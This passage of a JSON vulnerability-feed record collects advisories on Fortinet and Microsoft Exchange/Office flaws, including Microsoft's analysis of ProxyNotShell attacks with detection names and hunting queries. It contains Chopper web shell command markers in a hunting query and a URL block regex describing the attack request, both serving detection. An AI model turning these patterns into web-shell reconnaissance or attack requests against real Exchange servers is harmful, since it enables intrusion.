Horizon3.ai initially discovered that the vulnerability was being exploited in the wild and released a [proof of concept](<https://github.com/horizon3ai/CVE-2022-40684>) earlier today.\n\nThe post [Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass](<https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/>) appeared first on [Wordfence](<https://www.wordfence.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T21:08:36", "type": "wordfence", "title": "Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-13T21:08:36", "id": "WORDFENCE:98268684EA16A81FCA6F004B3CE9D86A", "href": "https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-02-08T15:37:55", "description": "### *Detect date*:\n09/30/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. 
Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Exchange Server 2016 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 22 \nMicrosoft Exchange Server 2019 Cumulative Update 11 \nMicrosoft Exchange Server 2019 Cumulative Update 12 \nMicrosoft Exchange Server 2013 Cumulative Update 23\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) \n[CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2022-41040](<https://vulners.com/cve/CVE-2022-41040>)5.0Critical \n[CVE-2022-41082](<https://vulners.com/cve/CVE-2022-41082>)5.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5019758](<http://support.microsoft.com/kb/5019758>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "kaspersky", "title": "KLA19264 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T00:00:00", "id": "KLA19264", "href": "https://threats.kaspersky.com/en/vulnerability/KLA19264/", "cvss": {"score": 0.0, "vector": 
"NONE"}}, {"lastseen": "2022-10-12T16:51:13", "description": "### *Detect date*:\n10/11/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface, obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Office LTSC 2021 for 64-bit editions \nMicrosoft Office LTSC 2021 for 32-bit editions \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft SharePoint Server Subscription Edition \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2019 for Mac \nMicrosoft Office LTSC for Mac 2021 \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office 2013 Service Pack 1 (64-bit editions)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-41036](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41036>) \n[CVE-2022-38001](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38001>) \n[CVE-2022-41037](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41037>) \n[CVE-2022-38048](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38048>) \n[CVE-2022-41031](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031>) \n[CVE-2022-38053](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38053>) 
\n[CVE-2022-38049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049>) \n[CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>) \n[CVE-2022-41038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *KB list*:\n[5002279](<http://support.microsoft.com/kb/5002279>) \n[5002287](<http://support.microsoft.com/kb/5002287>) \n[5002278](<http://support.microsoft.com/kb/5002278>) \n[5002283](<http://support.microsoft.com/kb/5002283>) \n[5002026](<http://support.microsoft.com/kb/5002026>) \n[5002290](<http://support.microsoft.com/kb/5002290>) \n[5002288](<http://support.microsoft.com/kb/5002288>) \n[5002284](<http://support.microsoft.com/kb/5002284>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "kaspersky", "title": "KLA20002 Multiple vulnerabilities in Microsoft Office", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-38001", "CVE-2022-38048", "CVE-2022-38049", "CVE-2022-38053", "CVE-2022-41031", "CVE-2022-41036", "CVE-2022-41037", "CVE-2022-41038", "CVE-2022-41043"], "modified": "2022-10-12T00:00:00", "id": "KLA20002", "href": "https://threats.kaspersky.com/en/vulnerability/KLA20002/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mssecure": [{"lastseen": "2022-10-07T17:09:27", "description": "> **October 1, 2022** **update** \u2013 Added information about _Exploit:Script/ExchgProxyRequest.A_, Microsoft Defender AV\u2019s robust detection 
for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance. \n\nMicrosoft is aware of [limited targeted attacks](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for mitigation guidance regarding these vulnerabilities. \n\nCVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.\n\n## Analysis of observed activity\n\n### Attacks using Exchange vulnerabilities prior to public disclosure\n\nMSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. 
These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\n\nMicrosoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.\n\nFigure 1: Diagram of attacks using Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082\n\n### Observed activity after public disclosure\n\nOn September 28, 2022, GTSC released a [blog](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.\n\nWhile these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. 
Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.\n\n## Mitigation\n\nCustomers should refer to [Microsoft Security Response Center\u2019s post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for the latest on mitigations for the Exchange product.\n\nMicrosoft Exchange Server customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-365-defender>) are advised to follow this checklist:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. 
EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Detection\n\n### Microsoft Defender Antivirus\n\n**Microsoft Exchange AMSI integration and Antivirus Exclusions**\n\nExchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the [guidance provided by the Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/bc-p/2576429/highlight/true>), as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange. \n\nMany organizations exclude Exchange directories from antivirus scans for performance reasons. It\u2019s highly recommended to audit AV exclusions on Exchange systems and assess if they can be removed without impacting performance and still ensure the highest level of protection. 
Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.\n\nTo audit AV exclusions on an Exchange Server running Defender Antivirus, launch the _Get-MpPreference_ command from an elevated PowerShell prompt.\n\nIf exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.\n\nMicrosoft Defender Antivirus detects the post-exploitation malware currently used in in-the-wild exploitation of this vulnerability as the following:\n\n**Microsoft Defender Antivirus detections**| **MITRE ATT&CK Tactics observed** \n---|--- \n[Exploit:Script/ExchgProxyRequest.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.A&threatId=-2147134610>)| Initial Access \n[Exploit:Script/ExchgProxyRequest.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.B&threatId=-2147134593>)| Initial Access \n[Exploit:Script/ExchgProxyRequest.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.C&threatId=-2147134381>)| Initial Access \n[Backdoor:ASP/Webshell.Y](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:ASP/Webshell.Y>)| Persistence \n[Backdoor:Win32/RewriteHttp.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/RewriteHttp.A>)| Persistence \n[Backdoor:JS/SimChocexShell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/SimChocexShell.A!dha&threatId=-2147134707>)| Persistence 
\n[Behavior:Win32/IISExchgDropWebshell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.A!dha&threatId=-2147189378>)| Persistence \nBehavior:Win32/IISExchgDropWebshell.A | Persistence \n[Trojan:Win32/IISExchgSpawnCMD.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/IISExchgSpawnCMD.A&threatId=-2147190657>)| Execution \n[Trojan:Win32/WebShellTerminal.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.A&threatId=-2147189572>)| Execution \n[Trojan:Win32/WebShellTerminal.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.B&threatId=-2147138186>)| Execution \n \nThe three _Exploit:Script/ExchgProxyRequest_ detections are the most robust defense from Microsoft Defender AV against this threat; they require Exchange AMSI to be enabled.\n\n### Microsoft Defender for Endpoint\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint>) detects post-exploitation activity. 
The following alerts could be related to this threat:\n\n**Indicators of attack**| **MITRE ATT&CK Tactics observed** \n---|--- \nPossible web shell installation | Persistence \nPossible IIS web shell | Persistence \nSuspicious Exchange Process Execution | Execution \nPossible exploitation of Exchange Server vulnerabilities (Requires Exchange AMSI to be enabled)| Initial Access \nSuspicious processes indicative of a web shell | Persistence \nPossible IIS compromise | Initial Access \n \nAs of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:\n\n**Indicators of attack**| **MITRE ATT&CK Tactics observed** \n---|--- \n'Chopper' malware was detected on an IIS Web server | Persistence \n'Chopper' high-severity malware was detected | Persistence \n \n### Microsoft Defender Threat Intelligence\n\n[Microsoft Defender Threat Intelligence](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-defender-threat-intelligence>) (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.\n\n### Microsoft Defender Vulnerability Management\n\nMicrosoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. 
These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational [exposure score](<https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide>). Customers can use the following capabilities to identify vulnerable devices and assess exposure:\n\n * Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.\n * Use the _DeviceTvmSoftwareVulnerabilities_ table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:\n \n \n DeviceTvmSoftwareVulnerabilities\n | where CveId in (\"CVE-2022-41040\", \"CVE-2022-41082\")\n \n\nFigure 2: Screenshot of the CVE information page where users can also take a look at related exposed device, software information, open vulnerability page, report inaccuracy, or read other useful references.\n\nNOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.\n\n## Advanced hunting\n\n### Microsoft Sentinel\n\nBased on what we\u2019re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on [web shell threat hunting with Microsoft Sentinel](<https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968>) also provides guidance on looking for web shells in general. 
\n\nThe [Exchange SSRF Autodiscover ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/08a8d2b9c5c9083e341be447773a34b56b205dee/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>) detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new [Exchange Server Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>) and [Exchange Worker Process Making Remote Call](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/ExchangeWorkerProcessMakingRemoteCall.yaml>) queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:\n\n * [Exchange OAB virtual directory attribute containing potential web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ExchangeOABVirtualDirectoryAttributeContainingPotentialWebshell.yaml>) \n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/WebShellActivity.yaml>) \n * [Malicious web application requests linked with Microsoft Defender for Endpoint alerts](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/MaliciousAlertLinkedWebRequests.yaml>) \n * [Exchange IIS worker dropping web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Execution/exchange-iis-worker-dropping-webshell.yaml>) \n * [Web shell detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/PotentialWebshell.yaml>) \n\n### Microsoft 365 Defender\n\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\n\n**Chopper web shell**\n\nUse this query to hunt for Chopper web shell activity:\n \n \n 
DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"w3wp.exe\"\n | where ProcessCommandLine has_any (\"&ipconfig&echo\", \"&quser&echo\", \"&whoami&echo\", \"&c:&echo\", \"&cd&echo\", \"&dir&echo\", \"&echo [E]\", \"&echo [S]\")\n \n\n**Suspicious files in Exchange directories**\n\nUse this query to hunt for suspicious files in Exchange directories:\n \n \n DeviceFileEvents\n | where Timestamp >= ago(7d)\n | where InitiatingProcessFileName == \"w3wp.exe\"\n | where FolderPath has \"FrontEnd\\\\HttpProxy\\\\\"\n | where InitiatingProcessCommandLine contains \"MSExchange\"\n | project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp\n\n## External attack surface management\n\n### Microsoft Defender External Attack Surface Management\n\n[Microsoft Defender External Attack Surface Management](<https://www.microsoft.com/en-us/security/business/cloud-security/microsoft-defender-external-attack-surface-management>) continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.\n\nA High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. 
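The two Microsoft 365 Defender advanced hunting queries above (Chopper command lines spawned by `w3wp.exe`, and files written under `FrontEnd\HttpProxy`) rendered as Python over constructed sample telemetry, so the filter logic can be read and exercised offline. This is an added example, not code from the Microsoft post; the column subsets, the sample events and the reference time are assumptions, and KQL `has`/`has_any` are approximated as case-insensitive substring tests (KQL's term matching is stricter).

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Command-line fragments listed in the Chopper hunting query above.
CHOPPER_MARKERS = ("&ipconfig&echo", "&quser&echo", "&whoami&echo", "&c:&echo",
                   "&cd&echo", "&dir&echo", "&echo [E]", "&echo [S]")


@dataclass
class ProcessEvent:          # subset of DeviceProcessEvents columns (assumption)
    timestamp: datetime
    device_id: str
    initiating_process_file_name: str
    process_command_line: str


@dataclass
class FileEvent:             # subset of DeviceFileEvents columns (assumption)
    timestamp: datetime
    device_id: str
    initiating_process_file_name: str
    initiating_process_command_line: str
    folder_path: str
    file_name: str
    sha256: str


def hunt_chopper(events):
    """DeviceProcessEvents | where InitiatingProcessFileName =~ "w3wp.exe"
    | where ProcessCommandLine has_any (CHOPPER_MARKERS)"""
    hits = []
    for e in events:
        if e.initiating_process_file_name.lower() != "w3wp.exe":   # =~ is case-insensitive
            continue
        cmd = e.process_command_line.lower()
        if any(marker in cmd for marker in CHOPPER_MARKERS):      # has_any, approximated
            hits.append(e)
    return hits


def hunt_httpproxy_drops(events, now, window=timedelta(days=7)):
    """DeviceFileEvents | where Timestamp >= ago(7d)
    | where InitiatingProcessFileName == "w3wp.exe"
    | where FolderPath has "FrontEnd\\HttpProxy\\"
    | where InitiatingProcessCommandLine contains "MSExchange"
    | project FileName, FolderPath, SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp"""
    cutoff = now - window
    rows = []
    for e in events:
        if e.timestamp < cutoff:
            continue
        if e.initiating_process_file_name != "w3wp.exe":           # == is case-sensitive
            continue
        if "frontend\\httpproxy\\" not in e.folder_path.lower():    # has, approximated
            continue
        if "msexchange" not in e.initiating_process_command_line.lower():  # contains
            continue
        rows.append({"FileName": e.file_name, "FolderPath": e.folder_path,
                     "SHA256": e.sha256,
                     "InitiatingProcessCommandLine": e.initiating_process_command_line,
                     "DeviceId": e.device_id, "Timestamp": e.timestamp})
    return rows


# Constructed sample telemetry (not real events).
NOW = datetime(2022, 10, 12, tzinfo=timezone.utc)
EXCHANGE_ROOT = r"C:\Program Files\Microsoft\Exchange Server\V15"
OWA_POOL_CMD = r'c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangeOWAAppPool" -v "v4.0"'

SAMPLE_PROCESS_EVENTS = [
    # Chopper-style one-liner spawned by the IIS worker: should match.
    ProcessEvent(NOW, "dev-1", "w3wp.exe",
                 'cmd /c cd /d "C:\\inetpub\\wwwroot"&whoami&echo [S]&cd&echo [E]'),
    # Same markers from an interactive shell, not the IIS worker: should not match.
    ProcessEvent(NOW, "dev-2", "explorer.exe", "cmd /c whoami&echo [S]"),
    # Ordinary child of the IIS worker without Chopper markers: should not match.
    ProcessEvent(NOW, "dev-1", "W3WP.EXE", r"C:\Windows\system32\conhost.exe 0x4"),
]

SAMPLE_FILE_EVENTS = [
    # Fresh .aspx under FrontEnd\HttpProxy written by an Exchange app pool: should match.
    FileEvent(NOW - timedelta(hours=2), "dev-1", "w3wp.exe", OWA_POOL_CMD,
              EXCHANGE_ROOT + r"\FrontEnd\HttpProxy\owa\auth", "helper.aspx", "<sha256-placeholder>"),
    # Same write but 30 days old: outside ago(7d).
    FileEvent(NOW - timedelta(days=30), "dev-1", "w3wp.exe", OWA_POOL_CMD,
              EXCHANGE_ROOT + r"\FrontEnd\HttpProxy\owa\auth", "old.aspx", "<sha256-placeholder>"),
    # Write under the back-end ClientAccess tree: outside the query's path filter.
    FileEvent(NOW, "dev-1", "w3wp.exe", OWA_POOL_CMD,
              EXCHANGE_ROOT + r"\ClientAccess\Owa", "theme.css", "<sha256-placeholder>"),
]

if __name__ == "__main__":
    for e in hunt_chopper(SAMPLE_PROCESS_EVENTS):
        print("chopper:", e.device_id, e.process_command_line)
    for row in hunt_httpproxy_drops(SAMPLE_FILE_EVENTS, NOW):
        print("drop:", row["DeviceId"], row["FolderPath"], row["FileName"])
```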
This insight, titled _CVE-2022-41082 & CVE-2022-41040 - Microsoft Exchange Server Authenticated SSRF and PowerShell RCE_, can be found under the high severity observations section of the Attack Surface Summary dashboard.\n\nThe post [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T04:21:00", "type": "mssecure", "title": "Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T04:21:00", "id": "MSSECURE:C857BFAD4920FD5B25BF42D5469945F6", "href": "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2022-11-10T03:01:01", "description": "### Overview\n\nMicrosoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. 
\n\n### Description\n\nMicrosoft Exchange Server's [ Autodiscover service](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) is a web service widely available to any Microsoft Exchange Web Services (EWS) client. Since Microsoft Exchange version 2016, the Autodiscover service has become an integral part of the Microsoft Exchange system, and it is no longer independently provided by a Client Access server. The Autodiscover service and a number of other privileged mailbox services are hosted on the default Internet Information Services server running on the Mailbox server. \n\nCybersecurity company GTSC [observed an abuse of the Autodiscover service in August of 2022](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using a crafted URL SSRF attack, similar to the earlier [ProxyShell](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) vulnerability reported in August 2021. The observed attack appears to have implemented [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) to gain privileged access and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) to perform remote code execution via PowerShell. Microsoft Security Research Center has [acknowledged the vulnerability and provided guidance for mitigation](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The guidance highlights that Microsoft Exchange Online customers will be provided with detection and mitigation defenses automatically from Microsoft's managed Infrastructure, informing them of any attempts to exploit these vulnerabilities. 
\n\n### Impact\n\nAn authenticated remote attacker can perform SSRF attacks to escalate privileges and execute arbitrary PowerShell code on vulnerable Microsoft Exchange servers. As the attack is targeted against the Microsoft Exchange Mailbox server, the attacker can potentially gain access to other resources via lateral movement into Exchange and Active Directory environments.\n\n### Solution\n\n#### Workaround guidance\n\nMicrosoft has provided guidance in their [recent blog post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) to address the issue. Note that Microsoft has updated their guidance for the Option 3 Step 6 with the URL filter to be _.*autodiscover\\\\.json.*Powershell.*_ (excluding the _@_ symbol) instead of the earlier _.*autodiscover\\\\.json.*\\@.*Powershell.*_. The recommended block pattern is a regular expression suggested by [Jang](<https://twitter.com/testanull>) to prevent known variants of the #ProxyNotShell attacks. Microsoft further updated their advisory on October 8th suggesting **Condition Input** should be changed from {URL} to 